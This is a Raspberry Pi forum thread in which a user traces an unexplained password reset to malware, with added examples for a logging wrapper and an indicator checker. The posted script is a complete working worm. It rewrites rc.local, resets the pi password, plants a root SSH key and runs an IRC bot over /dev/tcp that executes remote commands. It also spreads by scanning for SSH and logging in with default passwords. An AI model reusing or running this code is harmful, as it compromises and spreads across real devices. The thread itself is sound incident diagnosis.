congminh1709
Posts: 4
Joined: Sun Apr 24, 2016 10:04 am

[Investigation] pi's password is lost in every reboot issue

Sat May 18, 2019 7:03 pm

Hello everyone.

I'm investigating this issue: pi's password is lost on every reboot.
Issue summary: change pi's password with the passwd command -> reboot -> the changed password is always changed to another one which we don't know.

Yes, I know using the default pi account is not good for security, but in this topic I just focus on the investigation of the root cause.

After searching tons of results on Google (like these: https://raspberrypi.stackexchange.com/q ... ery-reboot and https://www.raspberrypi.org/forums/view ... p?t=195378 etc.) without finding a solution for this strange issue, I decided to investigate by myself. And I have found half of the root cause.

I used this command to trace the auth log

Code:

sudo tail /var/log/auth.log -n 100
And I always see this log at the shutdown step

Code:

May 19 01:02:41 raspberrypi usermod[866]: change user 'pi' password
Then I tried renaming the usermod binary and shutting down

Code:

sudo mv /usr/sbin/usermod /usr/sbin/usermod-dell
Then it worked: the usermod binary wasn't called and the password of the pi account isn't changed after rebooting anymore.
So it means something called usermod to change the password of the pi account, but I still can't trace exactly what that something is.
Does anyone have some recommendations or advice for me? Thank you so much.

This is the full log of the auth.log -n 100 command.

Code:

rp@raspberrypi:~ $ sudo tail /var/log/auth.log -n 100
[sudo] password for rp:
May 19 00:19:20 raspberrypi sudo: pam_unix(sudo:session): session closed for user root
May 19 00:19:31 raspberrypi sudo:       rp : TTY=pts/1 ; PWD=/home/rp ; USER=root ; COMMAND=/sbin/reboot
May 19 00:19:31 raspberrypi sudo: pam_unix(sudo:session): session opened for user root by rp(uid=0)
May 19 00:19:38 raspberrypi systemd-logind[478]: New seat seat0.
May 19 00:19:39 raspberrypi sshd[847]: Server listening on 0.0.0.0 port 22.
May 19 00:19:39 raspberrypi sshd[847]: Server listening on :: port 22.
May 19 00:19:39 raspberrypi usermod[824]: change user 'pi' password
May 19 00:19:40 raspberrypi sshd[847]: Received SIGHUP; restarting.
May 19 00:19:41 raspberrypi sshd[847]: Server listening on 0.0.0.0 port 22.
May 19 00:19:41 raspberrypi sshd[847]: Server listening on :: port 22.
May 19 00:19:46 raspberrypi lightdm: pam_unix(lightdm-autologin:session): session opened for user pi by (uid=0)
May 19 00:19:46 raspberrypi systemd-logind[478]: New session c1 of user pi.
May 19 00:19:46 raspberrypi systemd: pam_unix(systemd-user:session): session opened for user pi by (uid=0)
May 19 00:19:55 raspberrypi polkitd(authority=local): Registered Authentication Agent for unix-session:c1 (system bus name :1.12 [lxpolkit], object path /org/freedesktop/PolicyKit1/AuthenticationAgent, locale en_GB.UTF-8)
May 19 00:22:24 raspberrypi sudo:       pi : TTY=pts/0 ; PWD=/home/pi ; USER=root ; COMMAND=/usr/local/bin/noip2 -S
May 19 00:22:24 raspberrypi sudo: pam_unix(sudo:session): session opened for user root by (uid=0)
May 19 00:22:24 raspberrypi sudo: pam_unix(sudo:session): session closed for user root
May 19 00:22:36 raspberrypi passwd[2138]: pam_unix(passwd:chauthtok): authentication failure; logname= uid=1000 euid=0 tty= ruser= rhost=  user=pi
May 19 00:22:47 raspberrypi sudo:       pi : TTY=pts/0 ; PWD=/home/pi ; USER=root ; COMMAND=/usr/bin/passwd pi
May 19 00:22:47 raspberrypi sudo: pam_unix(sudo:session): session opened for user root by (uid=0)
May 19 00:22:55 raspberrypi passwd[2152]: pam_unix(passwd:chauthtok): password changed for pi
May 19 00:22:55 raspberrypi sudo: pam_unix(sudo:session): session closed for user root
May 19 00:23:11 raspberrypi passwd[2163]: pam_unix(passwd:chauthtok): password changed for pi
May 19 00:24:04 raspberrypi passwd[2235]: pam_unix(passwd:chauthtok): authentication failure; logname= uid=1000 euid=0 tty= ruser= rhost=  user=pi
May 19 00:24:43 raspberrypi passwd[2254]: pam_unix(passwd:chauthtok): password changed for pi
May 19 00:24:49 raspberrypi sudo:       pi : TTY=pts/0 ; PWD=/home/pi ; USER=root ; COMMAND=/sbin/reboot
May 19 00:24:50 raspberrypi sudo: pam_unix(sudo:session): session opened for user root by (uid=0)
May 19 00:24:57 raspberrypi systemd-logind[477]: New seat seat0.
May 19 00:24:58 raspberrypi sshd[881]: Server listening on 0.0.0.0 port 22.
May 19 00:24:58 raspberrypi sshd[881]: Server listening on :: port 22.
May 19 00:24:58 raspberrypi usermod[861]: change user 'pi' password
May 19 00:25:03 raspberrypi lightdm: pam_unix(lightdm-autologin:session): session opened for user pi by (uid=0)
May 19 00:25:04 raspberrypi systemd-logind[477]: New session c1 of user pi.
May 19 00:25:04 raspberrypi systemd: pam_unix(systemd-user:session): session opened for user pi by (uid=0)
May 19 00:25:11 raspberrypi polkitd(authority=local): Registered Authentication Agent for unix-session:c1 (system bus name :1.12 [lxpolkit], object path /org/freedesktop/PolicyKit1/AuthenticationAgent, locale en_GB.UTF-8)
May 19 00:26:56 raspberrypi passwd[2064]: pam_unix(passwd:chauthtok): authentication failure; logname= uid=1000 euid=0 tty= ruser= rhost=  user=pi
May 19 00:27:10 raspberrypi passwd[2068]: pam_unix(passwd:chauthtok): authentication failure; logname= uid=1000 euid=0 tty= ruser= rhost=  user=pi
May 19 00:39:01 raspberrypi CRON[8534]: pam_unix(cron:session): session opened for user root by (uid=0)
May 19 00:39:02 raspberrypi CRON[8534]: pam_unix(cron:session): session closed for user root
May 19 00:44:32 raspberrypi sshd[9696]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=192.168.1.155  user=rp
May 19 00:44:34 raspberrypi sshd[9696]: Failed password for rp from 192.168.1.155 port 51768 ssh2
May 19 00:44:41 raspberrypi sshd[9696]: Accepted password for rp from 192.168.1.155 port 51768 ssh2
May 19 00:44:41 raspberrypi sshd[9696]: pam_unix(sshd:session): session opened for user rp by (uid=0)
May 19 00:44:41 raspberrypi systemd-logind[477]: New session c2 of user rp.
May 19 00:44:41 raspberrypi systemd: pam_unix(systemd-user:session): session opened for user rp by (uid=0)
May 19 00:44:57 raspberrypi sudo: pam_unix(sudo:auth): authentication failure; logname=rp uid=1003 euid=0 tty=/dev/pts/1 ruser=rp rhost=  user=rp
May 19 00:45:03 raspberrypi sudo:       rp : TTY=pts/1 ; PWD=/home/rp ; USER=root ; COMMAND=/usr/sbin/update-rc.d noip2.sh enable
May 19 00:45:03 raspberrypi sudo: pam_unix(sudo:session): session opened for user root by rp(uid=0)
May 19 00:45:04 raspberrypi sudo: pam_unix(sudo:session): session closed for user root
May 19 00:45:36 raspberrypi smbd[10031]: pam_unix(samba:session): session opened for user pi by (uid=0)
May 19 00:46:55 raspberrypi sudo:       rp : TTY=pts/1 ; PWD=/home/rp ; USER=root ; COMMAND=/usr/local/bin/noip2 -S
May 19 00:46:55 raspberrypi sudo: pam_unix(sudo:session): session opened for user root by rp(uid=0)
May 19 00:46:55 raspberrypi sudo: pam_unix(sudo:session): session closed for user root
May 19 00:49:17 raspberrypi sudo:       rp : TTY=pts/1 ; PWD=/home/rp ; USER=root ; COMMAND=/usr/bin/tail /var/log/auth.log -n 100
May 19 00:49:17 raspberrypi sudo: pam_unix(sudo:session): session opened for user root by rp(uid=0)
May 19 00:49:17 raspberrypi sudo: pam_unix(sudo:session): session closed for user root
May 19 00:51:24 raspberrypi sudo:       rp : TTY=pts/1 ; PWD=/home/rp ; USER=root ; COMMAND=/usr/bin/passwd pi
May 19 00:51:24 raspberrypi sudo: pam_unix(sudo:session): session opened for user root by rp(uid=0)
May 19 00:51:30 raspberrypi passwd[11384]: pam_unix(passwd:chauthtok): password changed for pi
May 19 00:51:30 raspberrypi sudo: pam_unix(sudo:session): session closed for user root
May 19 00:51:39 raspberrypi sudo:       rp : TTY=pts/1 ; PWD=/home/rp ; USER=root ; COMMAND=/sbin/reboot
May 19 00:51:39 raspberrypi sudo: pam_unix(sudo:session): session opened for user root by rp(uid=0)
May 19 00:51:39 raspberrypi sshd[9696]: pam_unix(sshd:session): session closed for user rp
May 19 00:51:47 raspberrypi systemd-logind[475]: New seat seat0.
May 19 00:51:48 raspberrypi sshd[882]: Server listening on 0.0.0.0 port 22.
May 19 00:51:48 raspberrypi sshd[882]: Server listening on :: port 22.
May 19 00:51:48 raspberrypi usermod[859]: change user 'pi' password
May 19 00:51:55 raspberrypi lightdm: pam_unix(lightdm-autologin:session): session opened for user pi by (uid=0)
May 19 00:51:55 raspberrypi systemd-logind[475]: New session c1 of user pi.
May 19 00:51:55 raspberrypi systemd: pam_unix(systemd-user:session): session opened for user pi by (uid=0)
May 19 00:52:01 raspberrypi polkitd(authority=local): Registered Authentication Agent for unix-session:c1 (system bus name :1.12 [lxpolkit], object path /org/freedesktop/PolicyKit1/AuthenticationAgent, locale en_GB.UTF-8)
May 19 00:54:58 raspberrypi sshd[2091]: Accepted password for rp from 192.168.1.155 port 51869 ssh2
May 19 00:54:58 raspberrypi sshd[2091]: pam_unix(sshd:session): session opened for user rp by (uid=0)
May 19 00:54:58 raspberrypi systemd-logind[475]: New session c2 of user rp.
May 19 00:54:58 raspberrypi systemd: pam_unix(systemd-user:session): session opened for user rp by (uid=0)
May 19 00:55:08 raspberrypi sudo:       rp : TTY=pts/0 ; PWD=/home/rp ; USER=root ; COMMAND=/usr/bin/tail /var/log/auth.log -n 100
May 19 00:55:08 raspberrypi sudo: pam_unix(sudo:session): session opened for user root by rp(uid=0)
May 19 00:55:08 raspberrypi sudo: pam_unix(sudo:session): session closed for user root
May 19 01:02:21 raspberrypi sudo:       rp : TTY=pts/0 ; PWD=/home/rp ; USER=root ; COMMAND=/usr/local/bin/noip2 -S
May 19 01:02:21 raspberrypi sudo: pam_unix(sudo:session): session opened for user root by rp(uid=0)
May 19 01:02:21 raspberrypi sudo: pam_unix(sudo:session): session closed for user root
May 19 01:02:33 raspberrypi sudo:       rp : TTY=pts/0 ; PWD=/home/rp ; USER=root ; COMMAND=/sbin/reboot
May 19 01:02:33 raspberrypi sudo: pam_unix(sudo:session): session opened for user root by rp(uid=0)
May 19 01:02:33 raspberrypi sshd[2091]: pam_unix(sshd:session): session closed for user rp
May 19 01:02:33 raspberrypi sudo: pam_unix(sudo:session): session closed for user root
May 19 01:02:33 raspberrypi polkitd(authority=local): Unregistered Authentication Agent for unix-session:c1 (system bus name :1.12, object path /org/freedesktop/PolicyKit1/AuthenticationAgent, locale en_GB.UTF-8) (disconnected from bus)
May 19 01:02:40 raspberrypi systemd-logind[480]: New seat seat0.
May 19 01:02:41 raspberrypi sshd[879]: Server listening on 0.0.0.0 port 22.
May 19 01:02:41 raspberrypi sshd[879]: Server listening on :: port 22.
May 19 01:02:41 raspberrypi usermod[866]: change user 'pi' password
May 19 01:02:47 raspberrypi lightdm: pam_unix(lightdm-autologin:session): session opened for user pi by (uid=0)
May 19 01:02:47 raspberrypi systemd-logind[480]: New session c1 of user pi.
May 19 01:02:47 raspberrypi systemd: pam_unix(systemd-user:session): session opened for user pi by (uid=0)
May 19 01:02:53 raspberrypi polkitd(authority=local): Registered Authentication Agent for unix-session:c1 (system bus name :1.12 [lxpolkit], object path /org/freedesktop/PolicyKit1/AuthenticationAgent, locale en_GB.UTF-8)
May 19 01:04:53 raspberrypi sshd[2010]: Accepted password for rp from 192.168.1.155 port 51907 ssh2
May 19 01:04:53 raspberrypi sshd[2010]: pam_unix(sshd:session): session opened for user rp by (uid=0)
May 19 01:04:53 raspberrypi systemd-logind[480]: New session c2 of user rp.
May 19 01:04:53 raspberrypi systemd: pam_unix(systemd-user:session): session opened for user rp by (uid=0)
May 19 01:05:01 raspberrypi sudo:       rp : TTY=pts/0 ; PWD=/home/rp ; USER=root ; COMMAND=/usr/bin/tail /var/log/auth.log -n 100
May 19 01:05:01 raspberrypi sudo: pam_unix(sudo:session): session opened for use

rpdom
Posts: 14068
Joined: Sun May 06, 2012 5:17 am
Location: Chelmsford, Essex, UK

Re: [Investigation] pi's password is lost in every reboot issue

Sat May 18, 2019 9:21 pm

Try creating a "wrapper" script that pretends to be usermod, but dumps information to a file instead.

Something like

Code:

#!/bin/bash
(
echo "usermod called at $(date)"
echo "env"
env                  # environment the caller passed in
echo
echo "command line"
echo "$@"            # arguments usermod was invoked with
) >>/tmp/usermod.log
There are probably more things you can add to track down what is calling it, maybe using the ps command and looking at the parent PID
Signature is on holiday.

congminh1709
Posts: 4
Joined: Sun Apr 24, 2016 10:04 am

Re: [Investigation] pi's password is lost in every reboot issue

Sun May 19, 2019 1:33 am

rpdom wrote:
Sat May 18, 2019 9:21 pm
Try creating a "wrapper" script that pretends to be usermod, but dumps information to a file instead.

Something like

Code:

#!/bin/bash
(
echo "usermod called at $(date)"
echo "env"
env
echo
echo "command line"
echo "$@"
) >>/tmp/usermod.log
There are probably more things you can add to track down what is calling it, maybe using the ps command and looking at the parent PID
Thank you. I understand the idea, but how can I create this wrapper? Is it a binary? Does it mean I will write code, compile it to a binary and then overwrite the original usermod binary? Could you please explain in more detail how to create this wrapper?

ScriptBasic
Posts: 893
Joined: Wed Apr 03, 2019 5:53 pm
Location: Anacortes, WA USA

Re: [Investigation] pi's password is lost in every reboot issue

Sun May 19, 2019 1:35 am

Raspbian doesn't save the login info for a network connection either.

Paeryn
Posts: 2512
Joined: Wed Nov 23, 2011 1:10 am
Location: Sheffield, England

Re: [Investigation] pi's password is lost in every reboot issue

Sun May 19, 2019 2:08 am

congminh1709 wrote:
Sun May 19, 2019 1:33 am
rpdom wrote:
Sat May 18, 2019 9:21 pm
Try creating a "wrapper" script that pretends to be usermod, but dumps information to a file instead.

Something like

Code:

#!/bin/bash
(
echo "usermod called at $(date)"
echo "env"
env
echo
echo "command line"
echo "$@"
) >>/tmp/usermod.log
There are probably more things you can add to track down what is calling it, maybe using the ps command and looking at the parent PID
Thank you. I understand the idea, but how can I create this wrapper? Is it a binary? Does it mean I will write code, compile it to a binary and then overwrite the original usermod binary? Could you please explain in more detail how to create this wrapper?
It's a shell script, a plain text file. You said you've already renamed the original usermod program, so you already have the original as a backup. Type the shell script that rpdom gave into your text editor of choice and save it as /usr/sbin/usermod; you will need to run your editor with sudo to be able to save in that directory. Then you need to make it executable with sudo chmod +x /usr/sbin/usermod.

So (I use vim as my editor, you could use nano or any other depending on your preference),

Code:

sudo vim /usr/sbin/usermod
<enter the shell script given, save and quit>
sudo chmod +x /usr/sbin/usermod
The next time that the culprit tries executing usermod the file /tmp/usermod.log will have some information about how it was called.
She who travels light — forgot something.

congminh1709
Posts: 4
Joined: Sun Apr 24, 2016 10:04 am

Re: [Investigation] pi's password is lost in every reboot issue

Sun May 19, 2019 3:22 am

Paeryn wrote:
Sun May 19, 2019 2:08 am
....
The next time that the culprit tries executing usermod the file /tmp/usermod.log will have some information about how it was called.
Thank you. I did it and this is the log result.
But I still can't trace exactly what called usermod.

Code:

usermod called at Sun 19 May 10:03:01 +07 2019
env
TERM=linux
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
PWD=/
LANG=en_GB.UTF-8
SHLVL=2
_=/usr/bin/env

command line
-p $6$vGkGPKUr$heqvOhUzvbQ66Nb0JGCijh/81sG1WACcZgzPn8A0Wn58hHXWqy5yOgTlYJEbOjhk$

rpdom
Posts: 14068
Joined: Sun May 06, 2012 5:17 am
Location: Chelmsford, Essex, UK

Re: [Investigation] pi's password is lost in every reboot issue

Sun May 19, 2019 5:25 am

Ok, something that will give more information (you may have to keep adding bits to this, depending on how it is being called) is to add this line inside your usermod wrapper script; anywhere between the two brackets ( ) will do.

Code:

ps -p $PPID -o ruser,pid,ppid,cmd
That will display some information about the process that called usermod.
Signature is on holiday.
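As an added example (not rpdom's script and not from the thread): a version of the wrapper that logs the whole parent-process chain rather than only the immediate parent, and then hands the call on to the original binary, so legitimate usermod calls keep working while the trap is in place. It assumes the original was renamed to /usr/sbin/usermod-dell, as done earlier in the thread; the log path /var/log/usermod-wrapper.log is this example's own choice (writable by root only, unlike /tmp).

```shell
#!/bin/bash
# Added example: transparent usermod wrapper. Logs argv, the full caller
# chain and the environment, then execs the real binary.
# Assumptions: the original binary lives at /usr/sbin/usermod-dell (renamed
# earlier in the thread); the log path is this example's choice.
REAL_USERMOD=/usr/sbin/usermod-dell
LOG=/var/log/usermod-wrapper.log

# Print the ancestry of pid $1 as "pid ppid uid cmdline", one process per
# line, following PPid: in /proc/<pid>/status until pid 0 is reached.
ancestry() {
    pid=$1
    while [ "${pid:-0}" -gt 0 ] && [ -r "/proc/$pid/status" ]; do
        ppid=$(awk '/^PPid:/ {print $2}' "/proc/$pid/status")
        uid=$(awk '/^Uid:/ {print $2}' "/proc/$pid/status")
        cmd=$(tr '\0' ' ' < "/proc/$pid/cmdline")
        # kernel threads have an empty cmdline; fall back to the short name
        [ -n "$cmd" ] || cmd="[$(awk '/^Name:/ {print $2}' "/proc/$pid/status")]"
        printf '%s %s %s %s\n' "$pid" "$ppid" "$uid" "$cmd"
        pid=$ppid
    done
}

# Append one record describing the current invocation to log file $1.
log_call() {
    logfile=$1
    shift
    {
        echo "=== usermod called $(date '+%F %T') by pid $PPID ==="
        echo "argv: $*"
        echo "ancestry (pid ppid uid cmdline):"
        ancestry "$PPID"
        echo "env:"
        env
        echo
    } >> "$logfile"
}

# Act as the wrapper only when installed under the usermod name, so the file
# can be run or sourced on its own without touching the log or the real binary.
if [ "$(basename -- "$0")" = usermod ]; then
    log_call "$LOG" "$@"
    exec "$REAL_USERMOD" "$@"
fi
```

Install it with sudo as /usr/sbin/usermod and chmod +x, as Paeryn describes. Walking the chain matters in exactly this case: the one-level ps output later in the thread shows the caller as pid 597 running /bin/bash /opt/M8Zsr10D with parent 590, and the chain walk also shows what pid 590 is, i.e. how the script got started at boot.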

congminh1709
Posts: 4
Joined: Sun Apr 24, 2016 10:04 am

Re: [Investigation] pi's password is lost in every reboot issue

Sun May 19, 2019 7:37 am

rpdom wrote:
Sun May 19, 2019 5:25 am
Ok, something that will give more information ( you may have to keep adding bits to this, depending on how it is being called) is to add this line inside your usermod wrapper script, anywhere between the two brackets ( ) will do.

Code:

ps -p $PPID -o ruser,pid,ppid,cmd
That will display some information about the process that called usermod.
Thank you so much. Finally I have found it!! Windows Defender warns me this is a virus.
I share it here so everyone can reference it.
It looks like a virus?

Code:

usermod called at Sun 19 May 14:26:41 +07 2019
env
TERM=linux
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
PWD=/
LANG=en_GB.UTF-8
SHLVL=2
_=/usr/bin/env
RUSER      PID  PPID CMD
root       597   590 /bin/bash /opt/M8Zsr10D

command line
-p $6$vGkGPKUr$heqvOhUzvbQ66Nb0JGCijh/81sG1WACcZgzPn8A0Wn58hHXWqy5yOgTlYJEbOjhkHD0MRsAkfJgjU/ioCYDeR1 pi
Content of /opt/M8Zsr10D:

Code:

#!/bin/bash

MYSELF=`realpath $0`
DEBUG=/dev/null
echo $MYSELF >> $DEBUG

if [ "$EUID" -ne 0 ]
then 
	NEWMYSELF=`mktemp -u 'XXXXXXXX'`
	sudo cp $MYSELF /opt/$NEWMYSELF
	sudo sh -c "echo '#!/bin/sh -e' > /etc/rc.local"
	sudo sh -c "echo /opt/$NEWMYSELF >> /etc/rc.local"
	sudo sh -c "echo 'exit 0' >> /etc/rc.local"
	sleep 1
	sudo reboot
else
TMP1=`mktemp`
echo $TMP1 >> $DEBUG

killall bins.sh
killall minerd
killall node
killall nodejs
killall ktx-armv4l
killall ktx-i586
killall ktx-m68k
killall ktx-mips
killall ktx-mipsel
killall ktx-powerpc
killall ktx-sh4
killall ktx-sparc
killall arm5
killall zmap
killall kaiten
killall perl

echo "127.0.0.1 bins.deutschland-zahlung.eu" >> /etc/hosts
rm -rf /root/.bashrc
rm -rf /home/pi/.bashrc

usermod -p \$6\$vGkGPKUr\$heqvOhUzvbQ66Nb0JGCijh/81sG1WACcZgzPn8A0Wn58hHXWqy5yOgTlYJEbOjhkHD0MRsAkfJgjU/ioCYDeR1 pi

mkdir -p /root/.ssh
echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCl0kIN33IJISIufmqpqg54D6s4J0L7XV2kep0rNzgY1S1IdE8HDef7z1ipBVuGTygGsq+x4yVnxveGshVP48YmicQHJMCIljmn6Po0RMC48qihm/9ytoEYtkKkeiTR02c6DyIcDnX3QdlSmEqPqSNRQ/XDgM7qIB/VpYtAhK/7DoE8pqdoFNBU5+JlqeWYpsMO+qkHugKA5U22wEGs8xG2XyyDtrBcw10xz+M7U8Vpt0tEadeV973tXNNNpUgYGIFEsrDEAjbMkEsUw+iQmXg37EusEFjCVjBySGH3F+EQtwin3YmxbB9HRMzOIzNnXwCFaYU5JjTNnzylUBp/XB6B"  >> /root/.ssh/authorized_keys

echo "nameserver 8.8.8.8" >> /etc/resolv.conf
rm -rf /tmp/ktx*
rm -rf /tmp/cpuminer-multi
rm -rf /var/tmp/kaiten

cat > /tmp/public.pem <<EOFMARKER
-----BEGIN PUBLIC KEY-----
MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQC/ihTe2DLmG9huBi9DsCJ90MJs
glv7y530TWw2UqNtKjPPA1QXvNsWdiLpTzyvk8mv6ObWBF8hHzvyhJGCadl0v3HW
rXneU1DK+7iLRnkI4PRYYbdfwp92nRza00JUR7P4pghG5SnRK+R/579vIiy+1oAF
WRq+Z8HYMvPlgSRA3wIDAQAB
-----END PUBLIC KEY-----
EOFMARKER

BOT=`mktemp -u 'XXXXXXXX'`

cat > /tmp/$BOT <<'EOFMARKER'
#!/bin/bash

SYS=`uname -a | md5sum | awk -F' ' '{print $1}'`
NICK=a${SYS:24}
while [ true ]; do

	arr[0]="ix1.undernet.org"
	arr[1]="ix2.undernet.org"
	arr[2]="Ashburn.Va.Us.UnderNet.org"
	arr[3]="Bucharest.RO.EU.Undernet.Org"
	arr[4]="Budapest.HU.EU.UnderNet.org"
	arr[5]="Chicago.IL.US.Undernet.org"
	rand=$[$RANDOM % 6]
	svr=${arr[$rand]}

	eval 'exec 3<>/dev/tcp/$svr/6667;'
	if [[ ! "$?" -eq 0 ]] ; then
			continue
	fi

	echo $NICK

	eval 'printf "NICK $NICK\r\n" >&3;'
	if [[ ! "$?" -eq 0 ]] ; then
			continue
	fi
	eval 'printf "USER user 8 * :IRC hi\r\n" >&3;'
	if [[ ! "$?" -eq 0 ]] ; then
		continue
	fi

	# Main loop
	while [ true ]; do
		eval "read msg_in <&3;"

		if [[ ! "$?" -eq 0 ]] ; then
			break
		fi

		if  [[ "$msg_in" =~ "PING" ]] ; then
			printf "PONG %s\n" "${msg_in:5}";
			eval 'printf "PONG %s\r\n" "${msg_in:5}" >&3;'
			if [[ ! "$?" -eq 0 ]] ; then
				break
			fi
			sleep 1
			eval 'printf "JOIN #biret\r\n" >&3;'
			if [[ ! "$?" -eq 0 ]] ; then
				break
			fi
		elif [[ "$msg_in" =~ "PRIVMSG" ]] ; then
			privmsg_h=$(echo $msg_in| cut -d':' -f 3)
			privmsg_data=$(echo $msg_in| cut -d':' -f 4)
			privmsg_nick=$(echo $msg_in| cut -d':' -f 2 | cut -d'!' -f 1)

			hash=`echo $privmsg_data | base64 -d -i | md5sum | awk -F' ' '{print $1}'`
			sign=`echo $privmsg_h | base64 -d -i | openssl rsautl -verify -inkey /tmp/public.pem -pubin`

			if [[ "$sign" == "$hash" ]] ; then
				CMD=`echo $privmsg_data | base64 -d -i`
				RES=`bash -c "$CMD" | base64 -w 0`
				eval 'printf "PRIVMSG $privmsg_nick :$RES\r\n" >&3;'
				if [[ ! "$?" -eq 0 ]] ; then
					break
				fi
			fi
		fi
	done
done
EOFMARKER

chmod +x /tmp/$BOT
nohup /tmp/$BOT 2>&1 > /tmp/bot.log &
rm /tmp/nohup.log -rf
rm -rf nohup.out
sleep 3
rm -rf /tmp/$BOT

NAME=`mktemp -u 'XXXXXXXX'`

date > /tmp/.s

apt-get update -y --force-yes
apt-get install zmap sshpass -y --force-yes

while [ true ]; do
	FILE=`mktemp`
	zmap -p 22 -o $FILE -n 100000
	killall ssh scp
	for IP in `cat $FILE`
	do
		sshpass -praspberry scp -o ConnectTimeout=6 -o NumberOfPasswordPrompts=1 -o PreferredAuthentications=password -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no $MYSELF pi@$IP:/tmp/$NAME  && echo $IP >> /opt/.r && sshpass -praspberry ssh pi@$IP -o ConnectTimeout=6 -o NumberOfPasswordPrompts=1 -o PreferredAuthentications=password -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no "cd /tmp && chmod +x $NAME && bash -c ./$NAME" &
		sshpass -praspberryraspberry993311 scp -o ConnectTimeout=6 -o NumberOfPasswordPrompts=1 -o PreferredAuthentications=password -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no $MYSELF pi@$IP:/tmp/$NAME  && echo $IP >> /opt/.r && sshpass -praspberryraspberry993311 ssh pi@$IP -o ConnectTimeout=6 -o NumberOfPasswordPrompts=1 -o PreferredAuthentications=password -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no "cd /tmp && chmod +x $NAME && bash -c ./$NAME" &
	done
	rm -rf $FILE
	sleep 10
done

fi



rpdom
Posts: 14068
Joined: Sun May 06, 2012 5:17 am
Location: Chelmsford, Essex, UK

Re: [Investigation] pi's password is lost in every reboot issue

Sun May 19, 2019 8:46 am

Yes, your Pi has been compromised. It is accessible by someone from outside who can do whatever they like on it. It's not just the "pi" password that has been changed; they have allowed "root" access from somewhere else.

Turn it off now. Pull the power. Install a fresh copy of Raspbian on the card to completely destroy everything that was on it and start again. The first thing you need to do then is to change the "pi" password, preferably before connecting it to a network.
Signature is on holiday.
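Added example, not from the thread: a check for the artifacts the posted script leaves on disk, so the same infection can be recognised on other Pis, or on this SD card mounted on a clean machine, without trusting the running system. Every indicator is taken from the script itself: the rewritten /etc/rc.local pointing at /opt/<8 random characters>, the SSH key appended to /root/.ssh/authorized_keys, the /etc/hosts entry, the dropped files under /tmp and /opt, the zmap and sshpass packages it installs, and the deleted .bashrc files. The function and variable names are this example's own.

```shell
#!/bin/bash
# Added example: look for the on-disk indicators of the script posted above.
# Usage: check_rpi_iocs /          (live system)
#        check_rpi_iocs /mnt/sd    (SD card root mounted on a clean host)
# Prints one HIT line per indicator, sets IOC_HITS to the count and returns
# 0 only when nothing was found. Names here are this example's own.

IOC_HITS=0

ioc_hit() {
    IOC_HITS=$((IOC_HITS + 1))
    echo "HIT: $*"
}

check_rpi_iocs() {
    root=${1:-/}
    root=${root%/}          # accept "/mnt/sd/" as well as "/mnt/sd"; "/" becomes ""
    IOC_HITS=0

    # rc.local rewritten to run /opt/<8 random chars> on every boot
    if [ -f "$root/etc/rc.local" ]; then
        line=$(grep -E '^/opt/[A-Za-z0-9]{8}$' "$root/etc/rc.local" | head -n 1)
        [ -n "$line" ] && ioc_hit "/etc/rc.local starts $line"
    fi

    # attacker's key appended to root's authorized_keys (prefix of the posted key)
    grep -qsF 'AAAAB3NzaC1yc2EAAAADAQABAAABAQCl0kIN33IJISIufmqpqg54D6s4J0L7XV2kep0rNzgY1S1IdE8HDef7z1ipBVuGTygGsq' \
        "$root/root/.ssh/authorized_keys" && ioc_hit "attacker key in /root/.ssh/authorized_keys"

    # hosts entry the script adds to blackhole a competing botnet's host
    grep -qsF 'bins.deutschland-zahlung.eu' "$root/etc/hosts" \
        && ioc_hit "/etc/hosts entry for bins.deutschland-zahlung.eu"

    # files the script drops (signing key for bot commands, marker, victim list, bot log)
    for f in /tmp/public.pem /tmp/.s /opt/.r /tmp/bot.log; do
        [ -e "$root$f" ] && ioc_hit "dropped file $f"
    done

    # tools the script installs for its SSH scanning loop
    for t in zmap sshpass; do
        if [ -x "$root/usr/bin/$t" ] || [ -x "$root/usr/sbin/$t" ]; then
            ioc_hit "$t installed"
        fi
    done

    # the script deletes both shell rc files
    for h in /root /home/pi; do
        [ -d "$root$h" ] && [ ! -e "$root$h/.bashrc" ] && ioc_hit "$h/.bashrc missing"
    done

    [ "$IOC_HITS" -eq 0 ]
}
```

Treat a hit as confirmation only; a clean result does not prove the card is clean, because whoever holds the private half of that SSH key had root and could have changed anything. The bot itself lives only in memory: on a live system it is a bash process holding a connection to an Undernet IRC server on port 6667, accepting commands signed against /tmp/public.pem. Either way rpdom's advice stands: pull the power and reimage.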
